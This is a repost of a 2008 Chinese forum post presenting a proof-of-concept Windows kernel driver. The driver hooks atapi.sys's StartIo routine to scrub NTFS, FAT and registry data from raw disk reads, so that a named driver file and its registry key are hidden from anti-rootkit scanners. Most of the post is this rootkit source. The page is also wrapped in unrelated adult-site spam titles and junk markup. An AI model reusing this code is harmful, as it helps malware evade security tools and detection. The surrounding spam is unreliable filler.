青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品

S.l.e!ep.¢%

像打了激速一樣,以四倍的速度運轉(zhuǎn),開心的工作
簡單、開放、平等的公司文化;尊重個性、自由與個人價值;
posts - 1098, comments - 335, trackbacks - 0, articles - 1
  C++博客 :: 首頁 :: 新隨筆 :: 聯(lián)系 :: 聚合  :: 管理
【原創(chuàng)】[POC]基于IO Packet隱藏文件和注冊表,過磁盤解析和總線解析
QIQI 當(dāng)前離線 添加 QIQI 的聲望 反映此帖

標(biāo) 題: 【原創(chuàng)】[POC]基于IO Packet隱藏文件和注冊表,過磁盤解析和總線解析
作 者: QIQI
時 間: 2008-10-20,18:26
鏈 接: http://bbs.pediy.com/showthread.php?t=75007

[POC]基于IO?Packet隱藏文件和注冊表,過磁盤解析和總線解析?
昨天晚上玩過游戲,睡覺前寫了一點代碼,下午醒來又稍微改了改

只是POC~

文件的貌似有時候能隱藏又時候不行~郁悶的是每次跟過去就可以隱藏了,不跟的話有時候又隱藏不了~最后懶得改了~~~另外?由于沒有動CACHE,所以對于用API或者FSD的文件檢查反而過不去~

注冊表的部分過FILE?CACHE的低強度解析(例如狙劍)也是過不了的~由于這方面工具很少,冰刃和DARKSPY又總是在我的虛擬機上藍(lán)屏,所以就沒仔細(xì)測試了~也許有問題~

hook了atapi.sys的StartIo例程(由IoStartPacket例程調(diào)用,SCSI?REQUEST?BLOCK最后會調(diào)用到這里),過濾磁盤訪問~

目標(biāo)是隱藏名為mj0011k.sys及其注冊表項~
繞過所有磁盤解析(例如狙劍、FILEREG、RKU、RKR)
和總線解析(例如RKU發(fā)送SRB到ATAPI)

文件隱藏的handler直接照抄了AZY的代碼?^_^

代碼:
?
ULONG?oldstartio;
PDRIVER_OBJECT?atapi_dev?;?


VOID?unload(
??????????????????????PDEVICE_OBJECT?DeviceObject,
??????????????????????PIRP?Irp
????)
{
????atapi_dev->DriverStartIo?=?oldstartio?;?
????return?;?
}
CHAR?fileHide[]?=?"MJ0011K";
CHAR?fileExt[]?=?"SYS";
WCHAR?hideFile[]?=?L"MJ0011K.SYS";
typedef?struct?_INDEX_HEADER{
????UCHAR????????????magic[4];
????USHORT????????????UpdateSequenceOffset;
????USHORT????????????SizeInWords;
????LARGE_INTEGER????LogFileSeqNumber;
????LARGE_INTEGER????VCN;
????ULONG????????????IndexEntryOffset;????//?needed!
????ULONG????????????IndexEntrySize;
????ULONG????????????AllocateSize;
}INDEX_HEADER,?*PINDEX_HEADER;


typedef?struct?_INDEX_ENTRY{
????LARGE_INTEGER????????MFTReference;
????USHORT????????????Size;????????????????//?needed!
????USHORT????????????FileNameOffset;
????USHORT????????????Flags;
????USHORT????????????Padding;
????LARGE_INTEGER????????MFTReferParent;
????LARGE_INTEGER????????CreationTime;
????LARGE_INTEGER????????ModifyTime;
????LARGE_INTEGER????????FileRecModifyTime;
????LARGE_INTEGER????????AccessTime;
????LARGE_INTEGER????????AllocateSize;
????LARGE_INTEGER????????RealSize;
????LARGE_INTEGER????????FileFlags;
????UCHAR????????????FileNameLength;
????UCHAR????????????NameSpace;
????WCHAR????????????FileName[1];
}INDEX_ENTRY,?*PINDEX_ENTRY;

CHAR?NtfsFileRecordHeader[]?=?"FILE";
CHAR?NtfsIndexRootHeader[]?=?"INDX";
#define?FILERECORDSIZE?1024
ULONG?xxlong?=?0x7?;?
WCHAR?regname[]?=?L"MJ0011K";
VOID?HandleRegHide(PVOID?buf?,?ULONG?len?)
{
????ULONG?i?;?
????for?(i?=?0?;?i?<?len??;?i?++)
????{
????????if?(i?+?4?>=?len)
????????{
????????????break?;
????????}
????????if?(*(ULONG*)((ULONG)buf?+?i?)?==?xxlong)
????????{
????????????if?(i?+?4?+?xxlong?*?sizeof(WCHAR)?>=?len)
????????????{
????????????????break?;?
????????????}

????????????if?(_wcsnicmp((wchar_t*)((ULONG)buf?+?i?+?4)?,?regname?,?xxlong))
????????????{
????????????????RtlZeroMemory((PVOID)((ULONG)buf?+?i?+?4)?,?xxlong?*?sizeof(WCHAR));
????????????????*(ULONG*)((ULONG)buf?+i?)?=?0?;?
????????????????break?;?
????????????}
????????}
????}
????return?;?
}
VOID?HandleAkDiskHide(PVOID?UserBuf,?ULONG?BufLen)
{
????ULONG?i;
????BOOLEAN?bIsNtfsIndex;
????BOOLEAN?bIsNtfsFile;
????ULONG?offset?=?0;
????ULONG?indexSize?=?0;
????PINDEX_ENTRY?currIndxEntry?=?NULL;
????PINDEX_ENTRY?preIndxEntry?=?NULL;
????ULONG?currPosition;
????
????
????bIsNtfsFile?=?(_strnicmp(UserBuf,?NtfsFileRecordHeader,?4)?==?0);
????bIsNtfsIndex?=?(_strnicmp(UserBuf,?NtfsIndexRootHeader,?4)?==?0);
????
????if(bIsNtfsFile?==?FALSE?&&?bIsNtfsIndex?==?FALSE)
????{????????????
????????
????????for(i?=?0;?i?<?BufLen/0x20;?i++)
????????{
????????????if(!_strnicmp(UserBuf,?fileHide,?5)?&&?!_strnicmp((PVOID)((ULONG)UserBuf+0x8),?fileExt,?3))
????????????{
????????????????
????????????????*(PUCHAR)UserBuf????????=?0xe5;
????????????????*(PULONG)((ULONG)UserBuf?+?0x1)????=?0;
????????????????
????????????????break;
????????????????
????????????}
????????????
????????????UserBuf?=?(PVOID)((ULONG)UserBuf?+?0x20);
????????????
????????}
????????
????}?else?if(bIsNtfsFile)?{
????????
????????//DbgPrint("FILE0...");
????????
????????for(i?=?0;?i?<?BufLen?/?FILERECORDSIZE;?i++)
????????{
????????????if(!_wcsnicmp((PWCHAR)((ULONG)UserBuf?+?0xf2),?hideFile,?9))
????????????{
????????????????memset((PVOID)UserBuf,?0,?0x4);
????????????????memset((PVOID)((ULONG)UserBuf?+?0xf2),?0,?18);
????????????????break;
????????????}
????????????
????????????UserBuf?=?(PVOID)((ULONG)UserBuf?+?FILERECORDSIZE);
????????????
????????}
????????
????}?else?if(bIsNtfsIndex)?{
????????
????????//DbgPrint("INDX...");
????????//?Index?Entries
????????
????????offset?=?((PINDEX_HEADER)UserBuf)->IndexEntryOffset?+?0x18;
????????indexSize?=?BufLen?-?offset;
????????currPosition?=?0;
????????
????????currIndxEntry?=?(PINDEX_ENTRY)((ULONG)UserBuf?+?offset);
????????//DbgPrint("?--?offset:?0x%x?indexSize:?0x%x",?offset,?indexSize);
????????
????????while(currPosition?<?indexSize?&&?currIndxEntry->Size?>?0?&&?currIndxEntry->FileNameOffset?>?0)
????????{
????????????if(!_wcsnicmp(currIndxEntry->FileName,?hideFile,?9))
????????????{
????????????????memset((PVOID)currIndxEntry->FileName,?0,?18);
????????????????
????????????????if(currPosition?==?0)
????????????????{
????????????????????((PINDEX_HEADER)UserBuf)->IndexEntryOffset?+=?currIndxEntry->Size;
????????????????????break;
????????????????}
????????????????
????????????????preIndxEntry->Size?+=?currIndxEntry->Size;
????????????????
????????????????break;
????????????}
????????????
????????????currPosition?+=?currIndxEntry->Size;
????????????preIndxEntry?=?currIndxEntry;
????????????currIndxEntry?=?(PINDEX_ENTRY)((ULONG)currIndxEntry?+?currIndxEntry->Size);
????????????
????????}
????}
}



VOID?mystartio(??PDEVICE_OBJECT?DeviceObject,??PIRP?Irp?)
{
????PIO_STACK_LOCATION?irp_stack?;?

????irp_stack?=?IoGetCurrentIrpStackLocation(Irp);

????if?(irp_stack->DeviceObject->DeviceType?==?FILE_DEVICE_DISK?&&
????????irp_stack->Parameters.Scsi.Srb->Function?==?SRB_FUNCTION_EXECUTE_SCSI?&&
????????irp_stack->Parameters.Scsi.Srb->CdbLength?==?0xA?&&
????????(irp_stack->Parameters.Scsi.Srb->SrbFlags?&?SRB_FLAGS_DATA_IN)?&&
????????irp_stack->Parameters.Scsi.Srb->DataBuffer?&&
????????irp_stack->Parameters.Scsi.Srb->DataTransferLength
????????)

????{
????????PVOID?buf?=?irp_stack->Parameters.Scsi.Srb->DataBuffer?;?
????????ULONG?len?=?irp_stack->Parameters.Scsi.Srb->DataTransferLength?;?
????????ULONG?i?;?
????????PMDL?mdl?=?Irp->MdlAddress?;?

????????KDMSG(("disk?device?bus?read?request!lba?=?%08x?,?len?=?%08x\n",
????????????irp_stack->Parameters.Scsi.Srb->QueueSortKey?,
????????????irp_stack->Parameters.Scsi.Srb->DataTransferLength));

????????__asm
????????{
????????????push????Irp
????????????push????DeviceObject
????????????call????oldstartio
????????}


????????
????????buf?=?MmGetSystemAddressForMdl(mdl?);

????????HandleAkDiskHide(buf?,?len?);
????????HandleRegHide(buf?,?len);
????????return?;?
????????
????}
????__asm
????{
????????push????Irp
????????????push????DeviceObject
????????????call????oldstartio
????????}

????return?;
}
NTSTATUS?DriverEntry(PDRIVER_OBJECT?drvobj?,?PUNICODE_STRING?regpath)
{
????UNICODE_STRING?uniname?;?
????NTSTATUS?stat?;?


????drvobj->DriverUnload?=?(PDRIVER_UNLOAD?)unload?;?

????RtlInitUnicodeString(&uniname?,?L"\\Driver\\Atapi");

????stat?=?ObReferenceObjectByName(&uniname?,?
????????OBJ_CASE_INSENSITIVE?,?
????????NULL?,?
????????0,
????????*IoDriverObjectType?,?
????????KernelMode?,
????????NULL?,?
????????(PVOID*)&atapi_dev);

????if?(!NT_SUCCESS(stat))
????{
????????KDMSG(("get?atapi?drvobj?failed?,?stat?=?%08x\n"?,?stat));
????????return?stat?;?
????}

????oldstartio?=?atapi_dev->DriverStartIo?;
????atapi_dev->DriverStartIo?=?mystartio;

????return?STATUS_SUCCESS?;?
}
青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品
  • <ins id="pjuwb"></ins>
    <blockquote id="pjuwb"><pre id="pjuwb"></pre></blockquote>
    <noscript id="pjuwb"></noscript>
          <sup id="pjuwb"><pre id="pjuwb"></pre></sup>
            <dd id="pjuwb"></dd>
            <abbr id="pjuwb"></abbr>
            欧美久久一区| 另类综合日韩欧美亚洲| 欧美精品一区二区蜜臀亚洲| 久久久久久伊人| 亚洲人成在线免费观看| 国产精品系列在线播放| 欧美极品影院| 亚洲一区二区三区欧美| 免费成人你懂的| 久久精品国产清高在天天线| 西瓜成人精品人成网站| 亚洲一区二区三区乱码aⅴ蜜桃女| 亚洲激情不卡| 99国产精品99久久久久久| 一本色道久久88综合亚洲精品ⅰ | 欧美.com| 另类尿喷潮videofree| 老牛嫩草一区二区三区日本| 欧美成人精品三级在线观看| 欧美国产视频在线观看| 91久久精品国产91性色tv| 国产视频精品网| 日韩一区二区福利| 一级日韩一区在线观看| 一本色道**综合亚洲精品蜜桃冫| 99国产精品国产精品久久| 一区二区三区精品久久久| 亚洲欧美日本国产专区一区| 欧美在线观看天堂一区二区三区| 欧美影院久久久| 欧美高清日韩| 国产精品伦一区| 韩国av一区二区三区在线观看| 亚洲国产激情| 亚洲一区久久| 亚洲图片在线观看| 亚洲制服av| 亚洲欧美日韩一区二区在线 | 欧美一区二区三区成人| 美国成人直播| 国产精品久久久一区二区三区| 欧美日韩一区二区免费在线观看 | 欧美美女日韩| 国产一区二区三区黄| 最新高清无码专区| 性欧美超级视频| 欧美成人免费全部观看天天性色| 日韩一级黄色av| 久久精品免费观看| 欧美午夜视频在线| 亚洲国产成人av| 亚洲一区免费看| 亚洲欧美日韩一区在线观看| 榴莲视频成人在线观看| 亚洲午夜精品网| 蘑菇福利视频一区播放| 国产亚洲成精品久久| 一本色道久久综合一区| 老牛嫩草一区二区三区日本 | 在线播放豆国产99亚洲| 亚洲欧美激情一区| 亚洲激情图片小说视频| 久久久久亚洲综合| 国产午夜精品美女视频明星a级| 一区二区三区高清在线观看| 女主播福利一区| 日韩一级欧洲| 欧美一级日韩一级| 欧美日韩亚洲一区二区三区| 午夜精品在线观看| 欧美三区不卡| 亚洲日本成人网| 亚洲高清三级视频| 久久精品国产69国产精品亚洲| 欧美色综合天天久久综合精品| 亚洲国产日韩精品| 欧美成在线视频| 欧美体内she精视频| 亚洲免费在线电影| 亚洲视频电影在线| 国产揄拍国内精品对白| 欧美午夜a级限制福利片| 国产精品福利av| 欧美丝袜第一区| 校园春色国产精品| 久热国产精品视频| 性亚洲最疯狂xxxx高清| 亚洲精品在线观看视频| 国产亚洲欧美一区二区| 欧美伊人影院| 久久精品免费看| 国语自产精品视频在线看一大j8 | 欧美电影免费观看网站| 亚洲毛片av| 欧美大片在线看| 欧美高清在线一区| 性做久久久久久| 欧美超级免费视 在线| 99国产精品久久久久老师| 99精品热视频只有精品10| 国产欧美日韩不卡| 欧美大片免费| 国产精品另类一区| 亚洲精品一区二区三区蜜桃久| 国产一区二区精品久久| 亚洲先锋成人| 亚洲欧美三级伦理| 欧美三级资源在线| 亚洲一区二区在线观看视频| 亚洲激情偷拍| 久久躁狠狠躁夜夜爽| 久久青草福利网站| 激情偷拍久久| 久久久久久九九九九| 老巨人导航500精品| 黑人操亚洲美女惩罚| 欧美激情aaaa| 亚洲国产免费| 欧美精品一区二区三区蜜桃 | 韩国av一区二区| 亚洲女人天堂av| 欧美第一黄色网| 99国产精品久久久久久久| 亚洲国产精品小视频| 欧美激情成人在线| 日韩视频免费在线| 亚洲视频在线看| 欧美一区二区三区久久精品| 欧美一区二区三区在线视频| 久久经典综合| 欧美11—12娇小xxxx| 欧美超级免费视 在线| 亚洲片国产一区一级在线观看| av成人免费在线观看| 久久爱www| 欧美日韩国产色综合一二三四| 国产精品欧美久久| 亚洲国产人成综合网站| 性欧美在线看片a免费观看| 免费不卡亚洲欧美| 亚洲嫩草精品久久| 欧美日韩国产页| 亚洲黄色一区| 美国十次成人| 欧美在线视屏| 国产欧美精品va在线观看| 99国产精品久久久| 亚洲国产精品专区久久| 久久久激情视频| 激情综合激情| 久久免费的精品国产v∧| 在线中文字幕不卡| 欧美性大战久久久久久久| 亚洲国产一区二区精品专区| 久久精彩视频| 亚洲欧美日韩一区二区在线| 欧美亚州在线观看| 亚洲永久视频| 性刺激综合网| 亚洲大片在线观看| 欧美成人午夜激情在线| 美女久久一区| 亚洲视频免费看| 亚洲欧美另类在线| 亚洲成色777777女色窝| 亚洲国产日韩欧美| 国产精品露脸自拍| 免费一区二区三区| 国产精品白丝av嫩草影院| 久久精品国产成人| 蜜臀91精品一区二区三区| 一本到12不卡视频在线dvd| 亚洲视频免费在线| 亚洲国产精品99久久久久久久久| 亚洲人精品午夜| 午夜精品国产更新| 精品动漫3d一区二区三区| 亚洲精品中文字幕在线观看| 蘑菇福利视频一区播放| 欧美资源在线| 欧美色网一区二区| 久久一区激情| 欧美性事在线| 欧美成人激情视频免费观看| 欧美激情一区二区三级高清视频| 欧美一区二区三区在线看| 久久久久在线| 亚洲第一毛片| 黑丝一区二区三区| 日韩视频专区| 美女视频黄免费的久久| 欧美一级电影久久| 国产精品二区在线观看| 日韩视频二区| 亚洲黄色在线| 国产精品女主播在线观看| 一本色道久久88综合亚洲精品ⅰ| 久久久久久久一区二区| 欧美jizz19性欧美| 欧美成人综合|